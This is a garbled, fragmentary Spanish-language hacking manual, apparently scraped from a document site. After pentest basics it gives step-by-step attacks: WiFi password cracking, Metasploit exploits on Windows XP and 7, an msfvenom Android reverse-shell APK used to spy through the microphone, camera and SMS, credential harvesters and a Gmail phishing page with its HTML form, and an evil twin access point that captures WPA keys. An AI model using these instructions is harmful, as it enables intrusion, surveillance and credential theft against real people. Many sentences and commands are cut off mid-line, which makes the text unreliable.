Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Los probadores de penetración dividen las pruebas en dos categorías: manual y automatizado. Las pruebas manuales se basan en las
habilidades de un hacker de sombrero blanco. El probador tiene control completo sobre el proceso. Si comete un error, toda la prueba de
penetración puede resultar inútil. Las pruebas automatizadas, por otro lado, no necesitan intervención humana. Una vez que se ejecuta la
prueba, la computadora se encargará de todo: desde la selección de objetivos hasta el registro de los resultados.
En esta parte del libro, aprenderá información importante sobre este tipo de pruebas. Debes dominar este concepto
si te tomas en serio la piratería. Con este conocimiento, puede determinar fácilmente el tipo de prueba que debe
Realizará pruebas manuales la mayor parte del tiempo. Aquí, utilizará sus herramientas, habilidades y conocimientos para encontrar
las debilidades de una red. Las pruebas manuales implican los siguientes pasos:
Investigación: este paso tiene una gran influencia en todo el proceso. Si tienes mucha información sobre tu
objetivo, atacarlo será fácil. Puede realizar investigaciones utilizando internet. Por ejemplo, puede buscar
Kali Linux tiene una amplia gama de herramientas que puede utilizar en esta fase de "reconocimiento". Con los programas integrados
de Kali, puede recopilar fácilmente datos sobre sus objetivos (por ejemplo, hardware, software, base de datos, complementos, etc.).
Evaluación de debilidades: analice la información que recopiló e identifique las debilidades potenciales del
objetivo. Su conocimiento y experiencia lo ayudarán en esta tarea. Obviamente, primero debes trabajar en
las debilidades obvias. Esto se debe a que estas debilidades atraen a los hackers de sombrero negro.
Explotación: ahora que conoce las debilidades específicas de su objetivo, debe realizar un ataque. Usted
Preparación y envío de resultados: registre toda la información que recopiló durante la prueba. Organice los
datos para que sus clientes puedan determinar fácilmente los próximos pasos. Asegúrese de que su informe se
Pruebas integrales: este tipo de prueba cubre una red completa. Una prueba exhaustiva tiene como objetivo
determinar las conexiones entre las partes de un objetivo. Sin embargo, las pruebas exhaustivas requieren
mucho tiempo y son situacionales. Pruebas enfocadas: las pruebas que pertenecen a esta categoría se
concentran en un riesgo o vulnerabilidad específicos. Aquí, el hacker usará sus habilidades para identificar y
Las pruebas automatizadas son fáciles, rápidas, confiables y eficientes. Puede obtener informes detallados con solo
presionar un botón. El programa se encargará de todo en su nombre. En general, los programas utilizados en esta prueba
son aptos para novatos. No requieren habilidades o conocimientos especiales. Si puede leer y usar un mouse, está listo para
comenzar. Los programas más populares para pruebas automatizadas son Metasploit, Nessus y OpenVA. Metasploit es un
marco de piratería que puede lanzar ataques contra cualquier sistema operativo. Los hackers consideran a Metasploit como
Un sistema informático o red generalmente consta de múltiples dispositivos. La mayoría de estos dispositivos juegan un papel
importante para mantener el sistema / red estable y efectivo. Si uno de estos dispositivos funciona mal, todo el sistema o la red
podrían sufrir. Esa es la razón por la cual los probadores de penetración deben atacar la infraestructura de sus objetivos.
Una prueba de infraestructura involucra redes informáticas internas, conexión a internet, dispositivos externos y
Pruebas de infraestructura interna: los piratas informáticos pueden aprovechar las fallas en la seguridad
interna de una red. Al probar la estructura interna de un objetivo, podrá identificar y resolver las debilidades
existentes. También evitará que los miembros de la organización ataquen la estructura desde adentro.
Pruebas de infraestructura externa: estas pruebas simulan ataques de sombrero negro. Debido a que los
hackers malintencionados atacarán una red desde el exterior, es importante verificar si los mecanismos de
paquetes de datos simplemente viajarán de un dispositivo a otro. Esta tecnología ofrece comodidad. Sin embargo,
Aircrack-ng, Wireshark o herramientas similares obtienen estos paquetes de datos, la red será propensa a ataques de
piratería.
Una prueba de red inalámbrica permite al hacker de sombrero blanco mejorar las defensas del objetivo contra los ataques
inalámbricos. El probador también puede usar sus hallazgos para crear pautas para los usuarios finales de la red.
Pruebas de virtualización e infraestructura de la nube: almacenar información relacionada con la empresa en servidores de
terceros es extremadamente riesgoso. Los piratas informáticos pueden capturar los datos a medida que van al servidor "en
la nube". También pueden atacar el servidor en la nube y acceder a toda la información almacenada allí. Debido a que el
incidente ocurrió fuera de la red, el seguimiento de los culpables puede ser extremadamente difícil.
Cómo escribir un informe
Sus esfuerzos se desperdiciarán si no registra sus resultados. Para convertirse en un exitoso hacker de sombrero
blanco, debe saber cómo escribir buenos informes. En esta parte del libro, descubrirá consejos, trucos y técnicas
Tiempo: debe incluir la marca de tiempo de las actividades que realizará. Esto le dará una descripción precisa
del estado de la red. Si se produce un problema más adelante, el hacker puede usar las marcas de tiempo de
Audiencia: el informe debe tener una audiencia específica. Por ejemplo, puede dirigir su informe al
que contiene datos confidenciales. Sin embargo, el modo de clasificación depende de su cliente.
Distribución: su informe contiene información confidencial. Si un hacker de sombrero negro tiene acceso a ese
documento, la red que estaba destinado a proteger se apagará. Por lo tanto, su informe debe indicar el número
total de copias que realizó, así como las personas a las que las envió. Cada informe debe tener un número de
Recolección de datos
Las pruebas de penetración implican procesos largos y complejos. Como resultado, debe describir cada pieza de
información que recopilará durante el ataque. Describir tus técnicas de piratería no es suficiente. También debe
explicar sus evaluaciones, los resultados de sus escaneos, así como la salida de sus herramientas de piratería.
Corrección de pruebas
Los errores tipográficos y / o gramaticales pueden arruinar su informe. Por lo tanto, debe revisar su trabajo y asegurarse de
que esté libre de errores. Una vez que esté satisfecho con su resultado, solicite a sus colegas que lo verifiquen. Este enfoque
5. Resumen de resultados
6. Resumen de sugerencias
2. Metodología
1. Formulación del plan
1. Apéndice
El aspecto legal de las pruebas de penetración
Como hacker, tratará con datos confidenciales relacionados con una empresa u organización. Pueden ocurrir accidentes y la
información puede filtrarse a otras personas. Eso significa que debe estar preparado para los problemas legales que puedan
surgir en sus proyectos de piratería. Esta parte del libro discutirá el aspecto legal de la piratería. Lea este material
Problemas legales
Puede evitar los problemas mencionados anteriormente asegurando una "declaración de intenciones". Esta declaración prueba el
acuerdo entre el cliente y el probador. Este documento describe todos los detalles relacionados con la prueba de penetración. Utilizará
una declaración de intenciones para evitar problemas legales en el futuro. Por lo tanto, ambas partes deben firmar el documento antes
Este capítulo le enseñará varias técnicas de piratería. Estas técnicas son básicas, pero extremadamente efectivas.
Funcionan en diferentes situaciones: puede usarlos durante la práctica o al probar una red. Además, confían en
herramientas que están presentes en Kali Linux. Si está utilizando Kali como sistema operativo para sus actividades de
Nota importante: Kali Linux es un sistema operativo especialmente diseñado para hackers y probadores de penetración. No está
destinado a reemplazar Windows u OS X. Puede instalar Kali en una unidad flash para que no tenga que desinstalar el sistema
operativo de su computadora. Siempre que necesite piratear algo, simplemente conecte su unidad flash en una computadora portátil /
computadora de escritorio y listo. Todas tus herramientas de piratería están dentro de tu bolsillo, literalmente.
Cómo hackear redes WiFi que usan encriptación WEP
Cada vez más personas usan redes inalámbricas. Por lo tanto, cada hacker necesita saber cómo atacar este tipo de
objetivo. En esta sección, usará Kali Linux para hackear una contraseña WiFi cifrada con WEP.
Nota importante: Todavía estás practicando, así que no lo uses en la red de otras personas. Sería mejor si
creara su propia red inalámbrica. Hay muchos videos en YouTube sobre esa tarea. Mirar videos e instalar
una red es mejor que ser arrestado por atacar el WiFi de su vecino. Nunca olvides: el pirateo no autorizado
es ilegal. Para hackear una contraseña encriptada WEP, debe hacer lo siguiente:
Cada computadora contiene múltiples adaptadores de red. Su primera tarea es buscar el adaptador inalámbrico
y ver su nombre. Este paso es rápido e indoloro: solo tiene que abrir un terminal, escriba " ifconfig ", Y presiona la
La mayoría de las computadoras le darán tres adaptadores: eth, lo y wlan. Para esta tarea, debe centrarse en el adaptador
"wlan". La imagen de arriba muestra que el nombre del adaptador inalámbrico es "wlan1".
"Airmon-ng" es parte de la suite "Aircrack-ng". Le permite generar una interfaz de monitoreo para el ataque. Para
activar este programa, simplemente escriba " airmon-ng start wlan_ID ".
Reemplace "wlan_ID" con el nombre de su adaptador (por ejemplo, airmon-ng start wlan1 "). Su pantalla le
mostrará esto:
Ahora, debe recopilar algunos paquetes de datos disponibles en su área. Necesitas usar una herramienta llamada
"airodump-ng" para esto. Básicamente, "airodump-ng" (que es otro miembro de la suite aircrack-ng) busca paquetes de
airodump-ng wlan0mon.
Puede realizar esta tarea emitiendo el comando "-write" a airodump-ng. El código que debes usar es:
Simplemente reemplace "FileName" con el nombre de archivo que desea usar. Supongamos que desea utilizar "práctica" como
Inicie otra terminal y ejecute "aircrack-ng" para identificar la contraseña de la red. Simplemente escriba el nombre del
programa y especifique el archivo cap que creó anteriormente. Para este ejemplo, el comando es:
muestra de aircrack-ng
Es posible que su archivo contenga más de una red WiFi. Si ese es el caso, aircrack-ng le pedirá que
especifique el que desea atacar. Siga las instrucciones en pantalla y espere a que el programa complete
el proceso. El código resultante tendrá dos puntos (":") en él. Puede obtener la contraseña de la red
eliminando los dos puntos. Por ejemplo, si obtuvo EX: AM: PL: ES, la contraseña de la red es
EJEMPLOS.
Cómo hackear redes WiFi que usan cifrado WPA / WPA-2
Las contraseñas cifradas con WEP son fáciles de hackear. Las contraseñas WPA / WPA-2, sin embargo, consumen mucho
tiempo y requieren muchos recursos. Esta es la razón por la cual la mayoría de las redes WiFi usan encriptación WPA / WPA-2.
Romper esta forma de cifrado es difícil, pero ciertamente factible. Estos son los pasos que debe seguir:
Tipo:
airodump-ng wlan0mon
5. Tome nota del BSSID de su objetivo e inicie el programa llamado " aireplay-
ng ".
Encontrará el BSSID de una red en la pantalla airodump-ng. Después de obtener esa información, escriba:
7. Reemplace "NameofFile.cap" con el archivo cap que generó. Luego, reemplace "dictionary.txt" con el archivo de
diccionario que desea usar para el proceso. Un archivo de diccionario es un archivo de texto que contiene
posibles contraseñas. Kali Linux tiene varios archivos de diccionario que puede usar.
8. Espere a que el programa complete el proceso. Si su archivo de diccionario elegido contiene la contraseña
cifrada, aircrack-ng le dará un resultado positivo. Sin embargo, si la contraseña no está en el archivo de
Windows XP es un viejo sistema operativo. De hecho, Microsoft dejó de emitir actualizaciones para este sistema operativo. Sin embargo,
muchas personas todavía usan XP en sus computadoras. Debido a que este sistema operativo no recibirá actualizaciones futuras, sus
vulnerabilidades existentes estarán siempre disponibles para los piratas informáticos y los evaluadores de penetración.
Esta sección le enseñará cómo atacar Windows XP usando el marco Metasploit. El autor supone que está
utilizando Kali Linux y que tiene una máquina virtual que ejecuta Windows XP. Las máquinas virtuales le
permiten ejecutar múltiples sistemas operativos (en este caso, Kali Linux y Windows XP) en una sola
Nota importante: asegúrese de estar utilizando una máquina virtual. La práctica de esta técnica de piratería en una
computadora con Windows XP real puede ocasionar serios problemas. Si algo malo sucede en una máquina virtual, puede
reiniciarlo presionando algunos botones. Romper una computadora XP real, por otro lado, puede generar costos de
reparación.
El proceso
Debes entrar en una red antes de hackear las computadoras conectadas a ella. Sin embargo, esta lección no requiere
ningún ataque de red. Esto se debe a que el sistema operativo XP está instalado en su computadora Kali. Por lo tanto, la
Este comando activa PostgreSQL en su computadora. PostgreSQL sirve como la base de datos de Metasploit, por lo
que debe ejecutarlo primero antes de activar el programa en sí. Ahora, escriba:
Y
msfconsole
El marco Metasploit viene con varias herramientas auxiliares. Port Scan es una de las mejores herramientas presentes en este
marco. Esta herramienta le permite escanear todos los puertos de una máquina. Puede proporcionarle información detallada
sobre los puertos abiertos de su objetivo. Como saben, un puerto sirve como puerta de entrada para los hackers. Un puerto
abierto es una puerta abierta. Active Port Scan ingresando este comando:
mostrar opciones
Por defecto, Port Scan verificará cada puerto presente en el sistema. No desea que esto suceda, ya que todo el
proceso llevará mucho tiempo. Sería mejor si especificaras el rango de puertos a comprobar. Aquí hay un
ejemplo:
Para este ejemplo, debe acceder a la máquina virtual XP e iniciar un símbolo del sistema. Escriba "ipconfig" y busque la
Tipo " correr "Para comenzar el proceso. Metasploit mostrará todos los puertos abiertos presentes en su máquina virtual. Si el
escaneo no mostró ningún puerto abierto, regrese a su sistema operativo XP y apague su firewall. Luego, ejecute el escaneo
nuevamente. Supongamos que el escaneo descubrió dos puertos abiertos: 135 y 445.
Nota importante: en la práctica real, no sabrá la dirección IP de su objetivo. Eso significa que necesita usar NMAP
3. Búsqueda de exploits.
Esta es una de las fases más importantes del ataque. Debes encontrar un exploit que funcione en tu objetivo elegido. Salga de
Port Scanner escribiendo " espalda ". En la pantalla principal de msfconsole, escriba " buscar dcom ". El exploit "dcom" es una de
las mejores herramientas que puede usar para hackear una computadora XP.
mostrar opciones
del objetivo. Puede establecer un terminal abierto o plantar un virus. Hay miles de cargas disponibles en el marco
cargas útiles
4. La carga útil ideal para esta lección es "windows / shell_bind_tcp". Esta carga útil abre un shell (o símbolo del
sistema) en el destino a través de un puerto TCP. Puede configurar esta carga útil escribiendo:
5. Ahora que ha especificado cada aspecto del ataque, escriba " correr ".
6. Metasploit le dirá que se ha abierto un shell en su computadora de destino. Ese shell le otorga privilegios de
administrador sobre su objetivo. Puede descargar archivos de esa computadora o enviarle programas.
Los medidores de presión son las cargas útiles más fuertes que puede usar. Le dan un control completo sobre la máquina
infectada. En esta lección, sabrá cómo enviar un medidor de precisión utilizando Metasploit.
Nota importante: este proceso es similar al anterior. La única diferencia es que usará un tipo diferente de
carga útil. Para mantener este libro breve, usemos la información que recopiló anteriormente (la dirección IP
y los puertos abiertos). Las etapas restantes del ataque son:
Las cargas útiles tienen diferentes requisitos. Por ejemplo, una carga útil solo puede necesitar la dirección IP de su objetivo. Sin
embargo, algunas cargas útiles requieren la dirección IP del ataque, y los medidores pertenecen a este grupo. Eso significa que
Elija un exploit, establezca el RHOST e indique la carga útil. Para esta lección, el exploit que debe usar es
"ms08_067_netapi". Este exploit es el exploit más popular para las computadoras XP. Establezca la carga útil de
meterpreter escribiendo:
3. Escriba "explotar" para lanzar el ataque. Aparecerá un shell de meterpreter en su computadora de destino. Este shell te
permite hacer muchas cosas. Para ver las opciones disponibles, simplemente escriba un signo de interrogación. Estas
2. getpid: con este comando, puede identificar el programa que utiliza actualmente su meterpreter.
3. getuid: use este comando para obtener información sobre el usuario que atacó.
5. Ejecute killav: este comando puede desactivar el antivirus de su sistema de destino. Úselo si
Puedes hackear Windows XP fácilmente. Sin embargo, sus "hermanos" más jóvenes (Windows 7, 8 y 10) son muy difíciles
de roer. Estos sistemas modernos no tienen vulnerabilidades sin resolver. Eso significa que no puede ejecutar un exploit
directamente cuando piratea un sistema operativo moderno. En esta sección, su objetivo es derribar una computadora con
Windows 7 utilizando el marco Metasploit. Si tiene éxito, la máquina de destino mostrará una pantalla azul con algo de
galimatías. Este proceso es extremadamente fácil cuando se realiza a través de una red de área local. Nota importante:
debe tener Windows 7 en una máquina virtual. Recuerde: no practique sus habilidades de piratería en una computadora
real. Los resultados pueden ser desastrosos. Dividamos el proceso en varios pasos:
Recolección de datos
Debe determinar la dirección IP de su objetivo. Durante una prueba de penetración real, este proceso puede ser
difícil. Debe encontrar la dirección IP de una computadora sin ser detectado. En esta lección, sin embargo,
identificar la dirección IP es rápido y fácil. Solo tiene que acceder a su máquina virtual, iniciar un shell e ingresar
Lanzamiento de Metasploit
Regrese a su sistema operativo Kali Linux y abra una terminal. Luego, inicie el marco Metasploit emitiendo los
siguientes comandos:
msfconsole
Ejecutando el ataque
Elige el exploit para este ataque. El comando que debe emitir es:
use auxiliares / dos / windows / rdp / ms12_020_maxchannelids
Tipo " mostrar opciones "Para ver las opciones que ofrece este exploit. Encontrará que tiene dos requisitos: RPORT y
RHOST. Establezca "3389" como RPORT, ya que es el puerto para escritorios remotos. Establezca la dirección IP de su
objetivo como RHOST. Luego, escriba " explotar ". Su máquina de destino mostrará una pantalla azul y se reiniciará. Los
usuarios de computadoras se refieren a esa pantalla azul como "pantalla azul de la muerte". Metasploit te permite realizar
este truco muchas veces. En el mundo real, este ataque puede ser frustrante. Imagine lo que haría una persona si su
computadora se reinicia.
Cómo hackear un teléfono Android
Metasploit tiene un potente generador de carga útil llamado "msfvenom". Con msfvenom, puede crear cargas útiles para
cualquier dispositivo que desee hackear. En esta lección, usarás msfvenom para hackear un teléfono Android. Aquí
2. Especifique la carga útil y genere un archivo ejecutable. El comando que debe escribir es:
root @ kali : - # msfvenom –p android / meterpreter / reverse_tcp LHOST = 192.168.0.110 LPORT = 4444 R>
andro.apk
Nota importante: establezca su propia dirección IP en la sección LHOST del código. Además, no agregue caracteres de espacio
3. Este proceso generará un archivo apk, que es un archivo ejecutable para dispositivos Android. Envía e instala
controlar el archivo apk que envió. Los comandos que debe escribir son:
6. Metasploit lanzará el controlador de carga útil. Ahora, solo tiene que esperar hasta que su víctima inicie la aplicación instalada
7. Aproveche el dispositivo pirateado emitiendo comandos. Aquí hay algunos comandos que puede
usar:
1. geolocalizar: este comando le permite localizar el dispositivo de destino.
2. record_mic: este comando activa el micrófono del dispositivo pirateado. El micrófono grabará
cada sonido que haga su víctima. Esta información será enviada a su computadora.
3. dump_sms: con este comando, puede obtener los mensajes de texto presentes en el dispositivo de destino.
4. webcam_stream: este comando inicia una sesión de transmisión utilizando la cámara web del dispositivo
de destino.
5. webcam_snap: use este comando para tomar una foto con la cámara del teléfono pirateado.
6. dump_contacts: este comando captura todos los contactos presentes en el dispositivo de destino.
Cómo hackear una cuenta de Facebook
El sistema de Facebook utiliza mecanismos modernos de seguridad. Es extremadamente difícil superar sus defensas y
obtener información sobre sus usuarios. Afortunadamente, no tiene que atacar a Facebook directamente (a menos que
quiera derribar el sitio). Si solo planea robar la información de inicio de sesión de otras personas, puede usar una
En esta lección, creará una página de inicio de sesión falsa de Facebook. Enviarás esta página web falsa a los usuarios de Facebook. Una
vez que una persona inicia sesión, obtendrá toda la información que ingrese.
y enviar credenciales de inicio de sesión al hacker. Esta herramienta crea una dirección IP para el ataque. Como hacker,
El proceso
Para usar la herramienta Credential Harvester, debe:
4. El terminal enumerará todas las opciones disponibles. Ingrese "1", "2" y "3". Esto lanzará la herramienta
Credential Harvester.
1. Su dirección IP
2. La URL del sitio web que desea clonar
7. Minimice la terminal y vaya a "Lugares". Haga clic en "Computadora", presione "VAR" y abra el "directorio
8. Visita www.tinyurl.com para acortar la dirección IP. Una vez que un usuario de Facebook hace clic en
su enlace e ingresa sus credenciales de inicio de sesión, Credential Harvester registrará la información por usted.
Esta lección se centrará en una herramienta de piratería popular llamada Wapka. Esta herramienta puede ayudarlo a recopilar las
Wapka - Lo básico
Wapka es una plataforma de creación de sitios. Ofrece sitios web gratuitos y servicios de alojamiento. Con esta
herramienta, puede crear un sitio de phishing efectivo en solo unos minutos. Además, Wapka no requiere un amplio
Los requisitos
1. Un objetivo
El proceso
1. Visita http://u.wapka.com/wap/en/signup y crea una cuenta Wapka.
2. Acceda a su cuenta, busque "Lista de sitios" y haga clic en "Crear nuevo sitio".
3. Especifique el nombre de su sitio web. Wapka te permite combinar números y letras. No puedes usar
ningún personaje especial. Para esta lección, supongamos que el nombre de su sitio es "sitio de
muestra". La URL de su sitio web será "samplesite.wapka.mobi".
5. Verá una página web en blanco. Está vacío porque no ha hecho nada en su sitio. Busque el enlace que
8. Vuelva a la lista de sitios e inicie el sitio web en el que está trabajando. Esta vez, no active el modo
Administrador. Mire la parte inferior de la página web y presione "Visor de código fuente".
9. Coloque la URL de su sitio dentro del cuadro grande. Verás muchas casillas de verificación. Busque una entrada
10) Active el modo Administrador, haga clic en "Editar sitio" y elija "Usuarios".
11) Haga clic en "Visibilidad de elementos" y seleccione "Visible solo en modo administrador".
12) Acceda nuevamente al sitio y active el modo Administrador. Haga clic en "EDITAR SITIO"
<meta forua = "true" http-equiv = "Cache-Control" content = "max-age = 0" /> </head>
<template>
<do type = “options” name = “Prev” label = “Back”> <prev /> </do> </template>
<p> <script type = "text / javascript"> document.title = "Iniciar sesión"; </script> <title> Iniciar sesión </title>
“ltr "
style = "background-color: #eee; font-family: arial, helvetica, sans-serif; tamaño de fuente: 13px; relleno: 0; margin:
</div>
</body> </div>
</div>
<div> <div> <div style = “background-color: #fff; color del borde: # e5e5e5; ancho de borde: 1px 0 1px 0; estilo
de borde: sólido; relleno: 10px 0 10px 10px; margen: 0; ”> <form method =“ post ”class =“ mobile-login-form ”
ui% 3Dmobile% 26zyp% 3Dl & amp; scc = 1 & amp; ltmpl = ecobx & amp; nui = 5 & amp; btmpl = mobile & amp; emr = 1 ') ”actio
<div class =“ label ”> <b> Nombre de usuario </b> </div> <input type = “text” name = “mf_text [email]” value = ”” class = “textbox”
<input type = “password” name = “mf_text [password]” value = ”” class = “textbox” /> <br/>
<input type = “checkbox” name = “autologin_ch” value = “1” /> Manténgase conectado <br/> <input type = “hidden”
name = “action” value = “send_message” /> <input type = “ submit ”name =“ MF_submit ”value =” Iniciar sesión
”class =“ button ”/> </form> </div> <div> <div style =“ margin: 10px; ”> ¿Nuevo en Gmail? Es gratis y fácil. <br/>
<a id = “link-signup” href = “https://accounts.google.com/NewAccount? btmpl = mobile_tier2 & amp; service = mail &
<p><noscript/> </p> <p align = “center”> <a href="/menu_0.wml">: =: </a> </p> <p style = “text-align:
centro; "> <a
href = ”/ ads / wapka / p / 2462629 / adshows / 0 / aid / 23 / country / US / position / bottom”> <img src = ”/ pictures /
9apps.png” /> <br /> Las aplicaciones más populares y Descarga de juegos y fondos de pantalla </a> </p> <img src = ”/
ga.gif? Utmac = MO-324718051 & amp; utmn = 1113259389 & amp; utmr = -
& amp; utmp =% 2Findex.xhtml & amp; guid = ON ”width =“ 1 ”height =“ 1 ”/> <img src =“
http://ga.wapka.me/ga3.gif?utmac=MO-46050634-
1 & amp; utmn = 20217942 & amp; utmr = - & amp; utmp =% 2Findex.xhtml & amp; guid = ON ”width =" 1 "height
¡Felicidades! Usted creó su propio sitio de phishing para usuarios de Gmail. Una vez que un usuario de Gmail accede a esa página e
tu cuenta de Facebook.
Wapka no está disponible en India. El gobierno de ese país actualmente está bloqueando todos los sitios relacionados
con Wapka.
Puede utilizar los servicios de proxy para evitar las limitaciones mencionadas anteriormente. Debe alentar a los usuarios de Gmail
a acceder a su cuenta de correo electrónico a través de su página web falsa. Aquí hay algunas técnicas que puede usar:
Acorte la dirección web de su sitio de phishing a través de www.tinyurl.com . Envíe la URL a
personas con poco conocimiento sobre seguridad digital.
Como aprendió en capítulos anteriores, la recopilación de información es un aspecto importante de las pruebas de
piratería y penetración. Sus posibilidades de éxito aumentarán significativamente si tiene muchos datos sobre su
objetivo. En esta parte del libro, aprenderá a usar Kali Linux para recopilar información.
Kali Linux tiene una extensa colección de herramientas de "reconocimiento". Para mantener esta sección corta, centrémonos en una
herramienta llamada "TheHarvester". TheHarvester es una herramienta basada en Python que puede recopilar información importante en su
nombre. Puede tomar nombres de usuario, direcciones de correo electrónico, nombres de host y subdominios de varias fuentes.
El proceso
Acceda a su computadora Kali Linux y abra una terminal. Luego, escriba "theharvester" para iniciar la herramienta de
reconocimiento. TheHarvester viene como una herramienta incorporada para las últimas versiones de Kali, por lo que
probablemente no necesite descargar nada. Sin embargo, si su computadora no tiene este programa, puede visitar https://github.com
para descargarlo
indique el motor de búsqueda que desea usar. El resultado que obtendrá depende de la información
que pueda obtener el motor de búsqueda. Si desea obtener toda la información disponible sobre su
3. Los resultados de la búsqueda aparecerán en el terminal. Si desea guardar la información, puede agregar "-f" al
Los Evil Twin AP (es decir, los puntos de acceso) son puntos de acceso manipulados que pretenden ser puntos de acceso WiFi.
Cuando una persona se conecta a un Evil Twin AP, su información estará expuesta al hacker.
Para la víctima, el punto de acceso malicioso es un punto de acceso que tiene una gran señal. Esta percepción resulta del hecho de
que el hacker está cerca de la víctima. La gente ama las redes WiFi fuertes, por lo que es probable que una víctima se conecte a un
El proceso
1. Acceda a su computadora Kali.
4. Escriba
autoritario
tiempo de arrendamiento
192.168.1.255
enrutadores de opción 192.168.1.129 servidor de
192.168.1.130 192.168.1.140}
6. Una vez hecho esto, use la combinación de teclas CTRL + X y presione “Y”.
cd / var / www
rm index.html
eviltwin.zip rm eviltwin.zip
/etc/init.d/mysql start
/etc/init./apache2 start
10) Utilizará MySQL para generar una base de datos para almacenar WPA / WPA2
Mysql –u raíz
evil_twin
airodump-ng-oui-update
Dirección MAC de su punto de acceso) y el canal que necesita usar. El comando que debes usar
es:
airodump-ng –M mon0
airbase-ng –e [inserte el ESSID aquí] –c [inserte el número del canal aquí] –P mon0
dieciséis. El programa Airbase-ng creó una interfaz de túnel en su nombre. Solo tiene que configurar
esta interfaz de túnel para conectar su interfaz cableada y su punto de acceso "malvado". Para hacer esto,
route add –net 192.168.1.128 netmask 255.255.255.128 gw 192.186.1.129 echo 1> / proc / sys /
iptables –table net –append POSTROUTING –out-interface [nombre de la interfaz local] –j MASKQUERADE
iptables –append FORWARD –in-interface [nombre de la interfaz del túnel] –j ACEPTAR iptables –t net –A
etc./init.d/isc-dhcp-server start
Para lograr esto, debe generar un archivo de "lista negra" para contener el BSSID del objetivo. Emita los siguientes
comandos:
19) Mire la terminal que contiene su programa Airbase-ng. Vea si un objetivo conectado a su
punto de acceso. Cuando una persona intenta conectarse, verá una página de seguridad que solicita la clave
WPA / WPA2.
use evil_twin
21) Acceda a "wpa_keys" para ver los datos ingresados por su objetivo.
Capítulo 7: Cómo protegerse
Hoy, innumerables hackers están sueltos. Estas personas están propagando virus informáticos a través de Internet. Si no
tiene cuidado, los programas maliciosos pueden infectar su máquina. En este capítulo, aprenderá cómo protegerse de las
Los hackers usan los siguientes vectores para atraer a las víctimas:
Estafas
Es tu día de suerte. Alguien de Nigeria necesita su ayuda para contrabandear dinero de su país. No tienes que
hacer nada difícil. Solo tiene que realizar algunas transferencias electrónicas y esperar a que el nigeriano le
Mientras revisaba la bandeja de entrada de su cuenta de correo electrónico, vio un mensaje que decía que ganó un concurso. Solo
tiene que enviar algo de dinero para el envío y esperar a que llegue su premio. Las situaciones indicadas anteriormente son
estafas típicas. Probablemente pienses que nadie se enamoraría de ellos. Bueno, nada podría estar más lejos de la verdad. Miles
de personas caen en tales trucos. Las víctimas envían dinero y / o información confidencial a los piratas informáticos, esperando
un beneficio rápido.
Piensa antes de reaccionar a cualquier correo electrónico. Las estafas funcionan mejor contra las personas que actúan rápidamente. Si un
correo electrónico dice algo que es demasiado bueno para ser verdad, ignórelo. Si el mensaje le pide que brinde información personal,
Caballos de Troya
Un caballo de Troya sirve como contenedor para programas maliciosos. Este "contenedor" a menudo aparece como un archivo
interesante o importante. Una vez que descargue un caballo de Troya, su contenido infectará su computadora. Esta técnica es
En la mayoría de los casos, los hackers usan correos electrónicos para enviar troyanos. Envían un correo electrónico de phishing que
contiene un troyano como archivo adjunto. El correo electrónico lo alentará a descargar y abrir el archivo incluido.
Sin embargo, algunos piratas informáticos utilizan sitios de redes sociales para distribuir troyanos. Publican videos con
títulos interesantes. Una vez que haga clic en el video, la página web le indicará que debe actualizar su navegador primero
si desea ver el contenido. Bueno, la "actualización" que necesita descargar e instalar es un troyano.
La mejor manera de luchar contra este vector de piratería es utilizando su sentido común y ejecutando un
programa antivirus actualizado.
Descargas automáticas
En algunas situaciones, incluso los programas de seguridad actualizados no son suficientes. Su computadora puede
tener uno o más programas vulnerables que los hackers pueden aprovechar. Por ejemplo, si tiene una versión anterior de
Los hackers explotan las vulnerabilidades presentes en un programa estableciendo un sitio web manipulado. Estas personas atraen a
las víctimas enviando mensajes de phishing a través de correos electrónicos o sitios de redes sociales.
Tenga en cuenta, sin embargo, que los piratas informáticos no se limitan a sus propios sitios. Pueden atacar un sitio legítimo e
insertar códigos maliciosos en él. Una vez que visite un sitio comprometido, los códigos insertados analizarán su máquina en
busca de programas vulnerables. Luego, los códigos instalarán virus en su máquina automáticamente.
Puede protegerse manteniendo actualizadas las aplicaciones de su computadora. Los desarrolladores de software lanzan
actualizaciones y / o parches para sus productos. La mayoría de los programas pueden detectar cada vez que hay una nueva
actualización disponible. Simplemente le preguntarán si desea o no actualizar su programa. Presiona "Sí" y espera a que se
Las historias ficticias muestran a los piratas informáticos como personas que pueden adivinar las contraseñas con facilidad. Los
hackers del mundo real, sin embargo, rara vez usan este método. Ni siquiera se molestan en adivinar las contraseñas de sus
víctimas. Utilizan varios métodos para obtener esa información crucial. Puede mejorar su seguridad en línea utilizando
diferentes contraseñas para diferentes sitios. Por ejemplo, la contraseña de su cuenta de Facebook debe ser diferente de la de
su cuenta de Twitter. De esta manera, su cuenta de Twitter seguirá estando segura incluso si un hacker ataca con éxito su
Usar la misma contraseña para todas sus cuentas es extremadamente riesgoso. Cuando una de sus cuentas se ve
comprometida, el resto de sus cuentas también estarán en peligro. No tiene que usar contraseñas completamente
diferentes. Es suficiente agregar algunos caracteres a su contraseña principal para crear diferentes variaciones.
Un hacker también podría intentar responder a sus preguntas de seguridad. Puede proteger su cuenta dando una respuesta que no
esté relacionada con la pregunta. De esta manera, el hacker no podrá acceder a su cuenta, independientemente de cuán
cualquiera puede conectarse a la red e interactuar con las máquinas dentro de ella. Cuando un hacker ingresa a
su red, podrá ver y grabar todas las cosas que hace. También puede visitar sitios web restringidos y / o descargar
archivos ilegalmente a través de su conexión a Internet. Cuando ese hacker hace algo ilegal y es rastreado, la
policía lo visitará.
Es importante establecer una contraseña para su red WiFi. Asegúrese de que el cifrado de su red esté configurado en
WPA / WPA-2. Este cifrado implica hashing, lo que hace que piratear sea una tarea extremadamente difícil.
Cómo proteger su sitio web de los piratas informáticos
Hay muchas razones por las cuales un hacker atacaría el sitio web de una empresa. Por ejemplo, un pirata informático podría
intentar robar su información financiera para fines personales. También podría intentar obtener datos relacionados con el
negocio y venderlos a sus competidores. Debido a esto, debe hacer todo lo posible para proteger su sitio de hackers
maliciosos.
y destruir / modificar la información dentro de su base de datos. Aquí, el hacker insertará códigos SQL
maliciosos en los campos de formulario de su sitio web. DDoS (Denegación de servicio distribuida): el objetivo
de este ataque es derribar un sitio web temporalmente. Si un ataque DDoS tiene éxito, los usuarios legítimos
no podrán usar el sitio web. Los hackers lo realizan inundando el objetivo con solicitudes continuas.
CSRF (falsificación de solicitud de sitios cruzados): aquí, el pirata informático secuestrará una sesión para realizar compras en
nombre de la víctima. Este ataque ocurre cuando la víctima hace clic en una URL o descarga un archivo que ejecuta acciones
